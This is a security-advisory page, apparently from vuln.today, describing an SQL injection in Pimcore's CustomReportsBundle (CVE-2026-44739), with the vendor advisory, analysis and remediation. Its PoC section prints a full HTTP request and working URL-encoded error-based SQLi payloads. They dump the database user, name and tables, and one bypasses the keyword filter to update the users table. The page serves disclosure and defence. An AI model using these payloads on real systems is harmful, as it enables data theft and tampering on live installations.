Skip to main content

Pimcore CVE-2026-44739

HIGH
SQL Injection (CWE-89)
2026-05-27 https://github.com/pimcore/pimcore GHSA-3234-gxc3-pq6f
8.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 27, 2026 - 00:59 vuln.today
Analysis Generated
May 27, 2026 - 00:59 vuln.today
CVE Published
May 27, 2026 - 00:35 nvd
HIGH 8.7

DescriptionGitHub Advisory

Summary

The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques.

Affected scope

bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php CustomReportController:columnConfigAction -> SqlAdapter::getColumns -> SqlAdapter::buildQueryString -> Db::fetchAssociative()

Details

  • The columnConfigAction endpoint in ` bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:197 ` receives a configuration JSON string from the request body.
  • The configuration is decoded and the first element is extracted in `bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:207-208.`
  • The Sql adapter is instantiated based on the user-controlled type field in `bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:216.`
  • The controller calls getColumnsWithMetadata in `bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:217`, which in turn calls getColumns in `bundles/CustomReportsBundle/src/Tool/Adapter/AbstractAdapter.php:47`.
  • The Sql::getColumns method in` bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:60` calls buildQueryString at `bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:64.`
  • buildQueryString in `bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:81` concatenates various fields from the user-provided
  • configuration (like sql, from, where) directly into the SQL query string (lines 89, 100, 107).
  • The constructed SQL string is checked against a weak regex in `bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:67`, which can be bypassed using comments __(e.g. UPDATE/**/)__ or by using permitted SELECT statements to exfiltrate data from unauthorized tables.
  • The query is executed without parameterization using `$db->fetchAssociative($sql)` in `bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:70.`
  • Any resulting database exception is caught in the controller and the error message is returned in the JSON response at `bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:234`, enabling error-based exfiltration.

PoC

  • Download and install the version Pimcore <=12.3.3 (latest)
  • Login using Admin account or any account that has reports_config permission
  • Navigate to custom reports
  • Capture the request using burp suite and perform SQLi attack as the following
  1. Get Database username
POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1
Host: localhost
Content-Length: 310
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-pimcore-extjs-version-minor: 0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
X-pimcore-csrf-token: 2e42012c8310823bbdbce1598bdecfd19cb5e9c4
X-pimcore-extjs-version-major: 7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/
Accept-Encoding: gzip, deflate, br
Cookie: pimcore_admin_auth_profile_token=9f990b; PHPSESSID=d101f6fce4d87b8bdbbe800f9f50c82a; _pc_vis=3a17250fba52c657; _pc_ses=1774896807012; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3NzQ4OTc1MTQuNjEwNzE3LCJwdGciOnsiX20iOjEsIl9jIjoxNzc0ODk2ODA1LCJfdSI6MTc3NDg5NzUxNCwidmk6c3J1IjpbN119LCJleHAiOjE3NzQ4OTkzMTR9.uO4iHiABylQ2KyZC0p8Li9hpgWfHnNQ01GUkbeY1Wmc; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3NzQ4OTc1MTQuNjExNTA4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6Mn0sIl9jIjoxNzc0ODc2MzQyLCJfdSI6MTc3NDg5NjgwNX0sImV4cCI6MTgwNjQzMzUxNH0.mhq_2qwWzWWGruI0VNnAwgs8QzfZfbc6Za0uGn7zNYM
Connection: keep-alive

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%221%20AND%20(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(SELECT%20user())%2c0x7e))))x)%22%2c%22from%22%3a%22object_localized_CAR_en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes
  1. Get Database name
configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%221%20AND%20(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(select%2bcurrent_setting(%24%24is_superuser%24%24))%2c0x7e))))x)%22%2c%22from%22%3a%22object_localized_CAR_en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes
  1. Get Tables names

__Note__: Update the limit parameter to iterate around the tables queries like limit 0,1 limit 1,1 , limit 2,1 ..etc

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%22(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema%3ddatabase()%20LIMIT%200%2c1)%2c0x7e))))x)%22%2c%22from%22%3a%22object_localized_CAR_en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes
  1. Bypass the implemented Regex and perform SQL updat eto for exmaple update the admin username
configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%22*%22%2c%22from%22%3a%22users%22%2c%22where%22%3a%22id%3d1)%2f**%2fOR%2f**%2f1%3d1%3b%2f**%2fUPDATE%2f**%2fusers%2f**%2fSET%2f**%2fname%3d'admin'%2f**%2fWHERE%2f**%2fname%3d'admin2'%3b--%20-%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes

Impact

By exploiting this vulneability any user with custom-report access could manipuate and crawl the database information and also bypass the application filters to Update,insert or delete database tables, which impact on the application confidentiality ,intergrity and service availability

AnalysisAI

SQL injection in Pimcore's CustomReportsBundle (versions ≤ 12.3.5) lets an authenticated user holding the reports_config permission inject arbitrary SQL through the custom-report column-config endpoint, which concatenates user-supplied 'sql', 'from', and 'where' fields directly into a query executed via Doctrine's fetchAssociative(). Because the controller returns raw database error messages in its JSON response, attackers can perform error-based extraction (e.g. EXTRACTVALUE) to read credentials and arbitrary tables, and can bypass the keyword denylist using inline /**/ comments to reach UPDATE/INSERT/DELETE - compromising confidentiality and integrity. Publicly available exploit code exists (a full PoC is published in the GitHub advisory); no CISA KEV listing or EPSS score is present in the provided data.

Technical ContextAI

This is a classic CWE-89 SQL injection rooted in string concatenation rather than parameterized queries. The vulnerable path is CustomReportController::columnConfigAction -> SqlAdapter::getColumns -> SqlAdapter::buildQueryString -> Db::fetchAssociative(). The endpoint decodes a user-controlled JSON 'configuration' from the request body, selects the 'sql' adapter based on the user-supplied 'type', and buildQueryString() (Sql.php:81) splices the attacker's 'sql', 'from', and 'where' values straight into the SQL text (lines 89/100/107). The only guard is a weak blacklist regex /(ALTER|CREATE|DROP|RENAME|TRUNCATE|UPDATE|DELETE) /i, which is trivially defeated by inline comments (UPDATE/**/) or by simply using allowed SELECT/UNION constructs and dangerous functions. The final string is run through Doctrine DBAL's fetchAssociative($sql) with no binding. The affected package is the Composer distribution pkg:composer/pimcore/pimcore (PHP/Symfony), and error-based exfiltration is amplified because the controller echoes the database exception text into the JSON response (CustomReportController.php:234).

RemediationAI

Vendor-released patch: 12.3.6 - upgrade pimcore/pimcore to 12.3.6 or later (release https://github.com/pimcore/pimcore/releases/tag/v12.3.6; fix in PR https://github.com/pimcore/pimcore/pull/19098 and commit 3fd7733464f464e58ffa49ed91550c1a3f9535f2; advisory https://github.com/pimcore/pimcore/security/advisories/GHSA-3234-gxc3-pq6f). Be aware the fix still relies on a denylist regex but now strips SQL comments before validation via stripSqlCommentsForValidation(), so it closes the documented // bypass but does not convert the query to parameterized statements - keep this in mind for residual risk. If you cannot upgrade immediately, the most effective compensating control is to remove the reports_config permission from all but trusted administrators and audit who currently holds it, since that permission is the precondition for exploitation (trade-off: those users lose the ability to create/edit custom reports). Additionally, restrict or block network access to the /admin/bundle/customreports/custom-report/column-config endpoint at a reverse proxy/WAF and add rules flagging SQL meta-characters, UNION, EXTRACTVALUE, information_schema, and // in the 'configuration' parameter (trade-off: WAF signatures can be bypassed and may break legitimate complex reports), and ensure the admin interface is not exposed to untrusted networks to reduce the CSRF-assisted attack surface.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-44739 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy